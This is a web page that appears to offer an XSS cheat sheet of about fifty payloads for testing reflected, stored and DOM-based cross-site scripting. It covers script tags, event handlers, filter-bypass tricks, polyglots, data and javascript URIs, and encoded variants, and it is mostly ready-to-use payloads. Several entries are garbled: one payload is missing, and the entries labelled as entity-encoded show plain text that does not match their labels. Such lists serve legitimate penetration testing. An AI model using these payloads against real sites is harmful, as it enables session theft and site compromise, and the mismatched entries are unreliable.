XSS Cheat Sheet

Cross-Site Scripting (XSS) payloads for testing reflected, stored, and DOM-based XSS vulnerabilities. (50 payloads)

Basic Payloads

(10)

<script>alert(1)</script>

Classic script injection

<script>alert(document.domain)</script>

Show current domain

<script>alert(document.cookie)</script>

Exfiltrate cookies

<img src=x onerror=alert(1)>

Image error handler

<svg onload=alert(1)>

SVG load event

<body onload=alert(1)>

Body load event

<input onfocus=alert(1) autofocus>

Autofocus input

<marquee onstart=alert(1)>

Marquee start event

<details open ontoggle=alert(1)>

Details toggle event

<video src=x onerror=alert(1)>

Video error handler

Event Handlers

(10)

<div onmouseover="alert(1)">hover me</div>

Mouse over event

<div onmouseenter="alert(1)">hover me</div>

Mouse enter event

<a href="#" onclick="alert(1)">click</a>

Click handler

<input onblur=alert(1) autofocus><input autofocus>

Blur with autofocus trick

<select onfocus=alert(1) autofocus>

Select focus event

<textarea onfocus=alert(1) autofocus>

Textarea focus event

<keygen onfocus=alert(1) autofocus>

Keygen focus event

<audio src onloadstart=alert(1)>

Audio loadstart event

<form onsubmit=alert(1)><input type=submit>

Form submit handler

<object data="javascript:alert(1)">

Object with javascript URI

Filter Bypass

(12)

<ScRiPt>alert(1)</ScRiPt>

Mixed case bypass

<scr<script>ipt>alert(1)</scr</script>ipt>

Nested tag bypass

Template literal instead of parentheses

<img src=x onerror="alert(1)">

HTML entity encoding

<img src=x onerror=\u0061lert(1)>

Unicode escape in JS

<img/src=x onerror=alert(1)>

Slash instead of space

<img src=x onerror=alert(1)//>

Comment to close tag

<svg/onload=alert(1)>

SVG no-space tag

"><img src=x onerror=alert(1)>

Break out of attribute

'-alert(1)-'

Break out of JS string

</script><script>alert(1)</script>

Close and reopen script

<a href="javascript:void(0)" onmouseover=alert(1)>x</a>

Void href with event

Polyglots

(4)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Multi-context polyglot

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Gareth Heyes polyglot

"><svg/onload=alert(1)>//

Short attribute escape polyglot

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Multi-context tag polyglot

DOM-based XSS

(6)

#<img src=x onerror=alert(1)>

Hash fragment injection

javascript:alert(document.domain)

JavaScript URI scheme

data:text/html,<script>alert(1)</script>

Data URI injection

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

Base64 data URI

window.name='<script>alert(1)</script>'

window.name injection

document.location="javascript:alert(1)"

Location assignment

Encoding Tricks

(8)

%3Cscript%3Ealert(1)%3C/script%3E

URL encoded

%253Cscript%253Ealert(1)%253C/script%253E

Double URL encoded

<script>alert(1)</script>

Hex HTML entities

<script>alert(1)</script>

Decimal HTML entities

\x3cscript\x3ealert(1)\x3c/script\x3e

JS hex escape

\u003cscript\u003ealert(1)\u003c/script\u003e

JS unicode escape

<script>eval(atob("YWxlcnQoMSk="))</script>

Base64 eval

<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

fromCharCode eval

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

XSS Payload WAF Bypass

Related Cheat Sheets

SQL Injection Cheat Sheet Command Injection Cheat Sheet

$loading...